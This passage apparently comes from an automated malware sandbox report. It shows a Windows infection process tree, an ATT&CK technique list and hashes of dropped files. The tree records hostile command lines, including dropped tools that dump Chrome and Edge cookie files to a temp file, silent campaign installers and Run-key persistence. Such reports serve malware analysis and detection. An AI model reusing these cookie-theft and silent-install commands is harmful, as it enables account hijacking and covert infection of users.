                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4000
                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                      C:\Windows\system32\WerFault.exe -u -p 4000 -s 1884
                                                                                      6⤵
                                                                                      • Program crash
                                                                                      PID:5952
                                                                                  • C:\Users\Admin\AppData\Roaming\8193777.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\8193777.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Adds Run key to start application
                                                                                    PID:4128
                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4756
                                                                                  • C:\Users\Admin\AppData\Roaming\7051009.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\7051009.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4192
                                                                                  • C:\Users\Admin\AppData\Roaming\1895034.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\1895034.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetThreadContext
                                                                                    PID:4260
                                                                                    • C:\Users\Admin\AppData\Roaming\1895034.exe
                                                                                      C:\Users\Admin\AppData\Roaming\1895034.exe
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5084
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5084 -s 24
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:2300
                                                                                  • C:\Users\Admin\AppData\Roaming\5184184.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\5184184.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4340
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4340 -s 1952
                                                                                      6⤵
                                                                                      • Program crash
                                                                                      PID:5924
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-OB2OS.tmp\sahiba_4.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-OB2OS.tmp\sahiba_4.tmp" /SL5="$40032,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC8270754\sahiba_4.exe"
                                                                            1⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            PID:4016
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-VHD2T.tmp\2rk_frt_rate_on.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-VHD2T.tmp\2rk_frt_rate_on.exe" /S /UID=sysmo8
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              PID:4316
                                                                              • C:\Program Files\Windows Mail\ORDMPANUDI\SystemMonitor.exe
                                                                                "C:\Program Files\Windows Mail\ORDMPANUDI\SystemMonitor.exe" /VERYSILENT
                                                                                3⤵
                                                                                  PID:4824
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-JSSIJ.tmp\SystemMonitor.tmp
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-JSSIJ.tmp\SystemMonitor.tmp" /SL5="$102A2,174792,76800,C:\Program Files\Windows Mail\ORDMPANUDI\SystemMonitor.exe" /VERYSILENT
                                                                                    4⤵
                                                                                      PID:4580
                                                                                      • C:\Program Files (x86)\SystemMonitor\SystemMonitor.exe
                                                                                        "C:\Program Files (x86)\SystemMonitor\SystemMonitor.exe" -silent -desktopShortcut -programMenu
                                                                                        5⤵
                                                                                          PID:5476
                                                                                    • C:\Users\Admin\AppData\Local\Temp\62-131ca-4e4-38bb1-dc3d73c355f6e\Nulibiraty.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\62-131ca-4e4-38bb1-dc3d73c355f6e\Nulibiraty.exe"
                                                                                      3⤵
                                                                                        PID:3356
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2yvtichn.lc2\GcleanerEU.exe /eufive & exit
                                                                                          4⤵
                                                                                            PID:6752
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\inmgn1qd.oum\installer.exe /qn CAMPAIGN="654" & exit
                                                                                            4⤵
                                                                                              PID:7076
                                                                                              • C:\Users\Admin\AppData\Local\Temp\inmgn1qd.oum\installer.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\inmgn1qd.oum\installer.exe /qn CAMPAIGN="654"
                                                                                                5⤵
                                                                                                  PID:4916
                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\inmgn1qd.oum\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\inmgn1qd.oum\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1627362295 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                    6⤵
                                                                                                      PID:7216
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qty4pmwt.tpl\ufgaa.exe & exit
                                                                                                  4⤵
                                                                                                    PID:6520
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\qty4pmwt.tpl\ufgaa.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\qty4pmwt.tpl\ufgaa.exe
                                                                                                      5⤵
                                                                                                        PID:6716
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          6⤵
                                                                                                            PID:4076
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                            6⤵
                                                                                                              PID:4292
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                              6⤵
                                                                                                                PID:3420
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                6⤵
                                                                                                                  PID:6240
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  6⤵
                                                                                                                    PID:7240
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                    6⤵
                                                                                                                      PID:7292
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      6⤵
                                                                                                                        PID:7900
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                        6⤵
                                                                                                                          PID:7940
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ureeoyyy.q2z\2202.exe & exit
                                                                                                                      4⤵
                                                                                                                        PID:3180
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ureeoyyy.q2z\2202.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ureeoyyy.q2z\2202.exe
                                                                                                                          5⤵
                                                                                                                            PID:6496
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\ureeoyyy.q2z\2202.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\ureeoyyy.q2z\2202.exe" -a
                                                                                                                              6⤵
                                                                                                                                PID:5940
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dx4ld0wg.gzd\5674d7511aa1fce0a68969dc57375b63.exe & exit
                                                                                                                            4⤵
                                                                                                                              PID:5972
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\dx4ld0wg.gzd\5674d7511aa1fce0a68969dc57375b63.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\dx4ld0wg.gzd\5674d7511aa1fce0a68969dc57375b63.exe
                                                                                                                                5⤵
                                                                                                                                  PID:1352
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4p0bqe50.2wg\GcleanerWW.exe /mixone & exit
                                                                                                                                4⤵
                                                                                                                                  PID:5516
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ghlcg4bg.b0d\toolspab1.exe & exit
                                                                                                                                  4⤵
                                                                                                                                    PID:2172
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ghlcg4bg.b0d\toolspab1.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\ghlcg4bg.b0d\toolspab1.exe
                                                                                                                                      5⤵
                                                                                                                                        PID:4076
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ghlcg4bg.b0d\toolspab1.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\ghlcg4bg.b0d\toolspab1.exe
                                                                                                                                          6⤵
                                                                                                                                            PID:6436
                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gpk5nhu1.e0n\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                        4⤵
                                                                                                                                          PID:4468
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\gpk5nhu1.e0n\installer.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\gpk5nhu1.e0n\installer.exe /qn CAMPAIGN=654
                                                                                                                                            5⤵
                                                                                                                                              PID:740
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1p0joksb.0y4\app.exe /8-2222 & exit
                                                                                                                                            4⤵
                                                                                                                                              PID:5932
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1p0joksb.0y4\app.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1p0joksb.0y4\app.exe /8-2222
                                                                                                                                                5⤵
                                                                                                                                                  PID:7172
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a4-7833b-d62-7f493-3af4d2605ad80\Jixifamaepu.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a4-7833b-d62-7f493-3af4d2605ad80\Jixifamaepu.exe"
                                                                                                                                              3⤵
                                                                                                                                                PID:4424
                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                            1⤵
                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                            PID:5444
                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                              2⤵
                                                                                                                                                PID:5476
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                              1⤵
                                                                                                                                                PID:5568
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\FE27.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\FE27.exe
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:3316
                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                1⤵
                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                PID:200
                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3744
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1BB3.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1BB3.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5744
                                                                                                                                                  • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                    C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:6184
                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                      1⤵
                                                                                                                                                        PID:6816
                                                                                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                          PID:6812
                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                          1⤵
                                                                                                                                                            PID:6088
                                                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding 412706E16598C57FA269BD7688A77020 C
                                                                                                                                                              2⤵
                                                                                                                                                                PID:7040
                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 85A061FAB0C968984D708A621B2C093B
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:752
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:8048
                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4028
                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:6856
                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:7988
                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                      PID:8076
                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:8088
                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:6528

                                                                                                                                                                        Network

                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                        Persistence

                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                        1
                                                                                                                                                                        T1031

                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                        1
                                                                                                                                                                        T1060

                                                                                                                                                                        BITS Jobs

                                                                                                                                                                        1
                                                                                                                                                                        T1197

                                                                                                                                                                        Defense Evasion

                                                                                                                                                                        Modify Registry

                                                                                                                                                                        2
                                                                                                                                                                        T1112

                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                        1
                                                                                                                                                                        T1089

                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                        1
                                                                                                                                                                        T1497

                                                                                                                                                                        BITS Jobs

                                                                                                                                                                        1
                                                                                                                                                                        T1197

                                                                                                                                                                        Credential Access

                                                                                                                                                                        Credentials in Files

                                                                                                                                                                        3
                                                                                                                                                                        T1081

                                                                                                                                                                        Discovery

                                                                                                                                                                        Query Registry

                                                                                                                                                                        6
                                                                                                                                                                        T1012

                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                        1
                                                                                                                                                                        T1497

                                                                                                                                                                        System Information Discovery

                                                                                                                                                                        6
                                                                                                                                                                        T1082

                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                        1
                                                                                                                                                                        T1120

                                                                                                                                                                        Remote System Discovery

                                                                                                                                                                        1
                                                                                                                                                                        T1018

                                                                                                                                                                        Collection

                                                                                                                                                                        Data from Local System

                                                                                                                                                                        3
                                                                                                                                                                        T1005

                                                                                                                                                                        Command and Control

                                                                                                                                                                        Web Service

                                                                                                                                                                        1
                                                                                                                                                                        T1102

                                                                                                                                                                        Replay Monitor

                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                        Downloads

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                          MD5

                                                                                                                                                                          733fbc4e08679ce56d7712353081987f

                                                                                                                                                                          SHA1

                                                                                                                                                                          be52e781fb0431414c3904a53eef9586ab9cffaf

                                                                                                                                                                          SHA256

                                                                                                                                                                          02372dcc5a0142aea622efef58d23f504a1dbf7df8169044a44b546f0e038803

                                                                                                                                                                          SHA512

                                                                                                                                                                          224a723bad370cd0612793d6a0b371e4247d87edf550b0cb4c3fcf0c2ca0722bceb8125b6acd5e0888bbca3765bfbc72407e3f4a4aafae01496b06841afc4992

                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                          MD5

                                                                                                                                                                          565da21dd6b1d0b2c1e0d682e7ad7aff

                                                                                                                                                                          SHA1

                                                                                                                                                                          fdf543a100c8a9aa1974ef56697bd671a410b3f8

                                                                                                                                                                          SHA256

                                                                                                                                                                          ec849141422ccc652e22a3885b8128548dfeac8dfc105131cfb9d00833861733

                                                                                                                                                                          SHA512

                                                                                                                                                                          72346b6132940342e5067dc632d7c53d65a247ae7ddd40234506d54437e4c59f037f180fb5df6a3c7ebd6c9a0fb9d7b0a2d9e43399a578f3eb98aa4dacf4539a

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                          MD5

                                                                                                                                                                          cc0d6b6813f92dbf5be3ecacf44d662a

                                                                                                                                                                          SHA1

                                                                                                                                                                          b968c57a14ddada4128356f6e39fb66c6d864d3f

                                                                                                                                                                          SHA256

                                                                                                                                                                          0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498

                                                                                                                                                                          SHA512

                                                                                                                                                                          4d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                          MD5

                                                                                                                                                                          cc0d6b6813f92dbf5be3ecacf44d662a

                                                                                                                                                                          SHA1

                                                                                                                                                                          b968c57a14ddada4128356f6e39fb66c6d864d3f

                                                                                                                                                                          SHA256

                                                                                                                                                                          0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498

                                                                                                                                                                          SHA512

                                                                                                                                                                          4d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                          MD5

                                                                                                                                                                          cc0d6b6813f92dbf5be3ecacf44d662a

                                                                                                                                                                          SHA1

                                                                                                                                                                          b968c57a14ddada4128356f6e39fb66c6d864d3f

                                                                                                                                                                          SHA256

                                                                                                                                                                          0c2ade2993927f6de828e30c07156c19751b55650a05c965631ca0ea1c983498

                                                                                                                                                                          SHA512

                                                                                                                                                                          4d4275338cd8a089c25757440b876654b569d39bfd970109cceb09c29ca79c8f3b1fdfcc6316ef18a9eb68cddf0c2d6daa0fa27fafc1f27b8103b4aa1db1fbc5

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Compatto.rtf
                                                                                                                                                                          MD5

                                                                                                                                                                          b96b1288ce038869fb15d4353f760613

                                                                                                                                                                          SHA1

                                                                                                                                                                          5a6f01cb0546a6dd4ae1e90279aaa82bdd672b60

                                                                                                                                                                          SHA256

                                                                                                                                                                          2c1458ecd2cc31a6d798a1c6396926cb99a66481832f774dbdbc19594ff9bd40

                                                                                                                                                                          SHA512

                                                                                                                                                                          36a72a5cac8b1aaa395d9efc2fc79b4525e408c57cebaaf2f00c1ba5b51bc08ee22e5676055cdcc961197c05e41d020c8d74b0d95426095d1a5b04fb14d3b04e

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Incontrati.rtf
                                                                                                                                                                          MD5

                                                                                                                                                                          2159edf39246faecd80a5bb1638b0212

                                                                                                                                                                          SHA1

                                                                                                                                                                          44930f0fe67b06a73c57ff56976894632890aa6b

                                                                                                                                                                          SHA256

                                                                                                                                                                          8dec7534543bc983bcd6965539e3d26de768775ac117a108b545a5b4e3bb3614

                                                                                                                                                                          SHA512

                                                                                                                                                                          49b34aab60b12e98da6f521adf6d4c3ced8245df327a84b8c39d096fc26916ed95ddc212fb05558cf801213e62b5c40cba6cd5cde321f4d23af8bd7e54694a33

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Oggi.rtf
                                                                                                                                                                          MD5

                                                                                                                                                                          916c4387e392f4f3c300d18dc396b739

                                                                                                                                                                          SHA1

                                                                                                                                                                          c7b480305599093ed6f88f5d8597fc5facc7cb3e

                                                                                                                                                                          SHA256

                                                                                                                                                                          d574f83fc092c037db7625e3b2dbe16a4898f9e8ec187c3a5744c699bdb5b75e

                                                                                                                                                                          SHA512

                                                                                                                                                                          9166b8ff071f067bbd31f39c2201285dc1c2096c693849006554a8ca0201b8d43b2ad0c786b5bb4bdfe897870d0609bc6011aaf8baee1456a473045ea9189584

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Triste.exe.com
                                                                                                                                                                          MD5

                                                                                                                                                                          c56b5f0201a3b3de53e561fe76912bfd

                                                                                                                                                                          SHA1

                                                                                                                                                                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                                                                                                                                                                          SHA256

                                                                                                                                                                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                                                                                                                                                                          SHA512

                                                                                                                                                                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Triste.exe.com
                                                                                                                                                                          MD5

                                                                                                                                                                          c56b5f0201a3b3de53e561fe76912bfd

                                                                                                                                                                          SHA1

                                                                                                                                                                          2a4062e10a5de813f5688221dbeb3f3ff33eb417

                                                                                                                                                                          SHA256

                                                                                                                                                                          237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

                                                                                                                                                                          SHA512

                                                                                                                                                                          195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Troverai.rtf
                                                                                                                                                                          MD5

                                                                                                                                                                          7fa88f5686ca445f2a90cb05d761975f

                                                                                                                                                                          SHA1

                                                                                                                                                                          1ffd9e0375a825deb059121951ce81844f97d527

                                                                                                                                                                          SHA256

                                                                                                                                                                          94b01919c10661d96e0f8ccf05e143b76d94cae3dafc0e5cc7998d22b060ad1a

                                                                                                                                                                          SHA512

                                                                                                                                                                          379cd229c1a5af95ab3a67943338879e0ef7fc971a51a56ad68997b38a8de69f6694e8e4dc497f174dee46740efd35f580258b29b5ac385c2ae8c837a6d94460

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\n
                                                                                                                                                                          MD5

                                                                                                                                                                          7fa88f5686ca445f2a90cb05d761975f

                                                                                                                                                                          SHA1

                                                                                                                                                                          1ffd9e0375a825deb059121951ce81844f97d527

                                                                                                                                                                          SHA256

                                                                                                                                                                          94b01919c10661d96e0f8ccf05e143b76d94cae3dafc0e5cc7998d22b060ad1a

                                                                                                                                                                          SHA512

                                                                                                                                                                          379cd229c1a5af95ab3a67943338879e0ef7fc971a51a56ad68997b38a8de69f6694e8e4dc497f174dee46740efd35f580258b29b5ac385c2ae8c837a6d94460

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8270754\libcurl.dll
                                                                                                                                                                          MD5

                                                                                                                                                                          d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                          SHA1

                                                                                                                                                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                          SHA256

                                                                                                                                                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                          SHA512

                                                                                                                                                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8270754\libcurlpp.dll
                                                                                                                                                                          MD5

                                                                                                                                                                          e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                          SHA1

                                                                                                                                                                          b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                          SHA256

                                                                                                                                                                          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                          SHA512

                                                                                                                                                                          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC8270754\libgcc_s_dw2-1.dll
                                                                                                                                                                          MD5

                                                                                                                                                                          9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                          SHA1

                                                                                                                                                                          64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                          SHA256

                                                                                                                                                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                          SHA512

                                                                                                                                                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

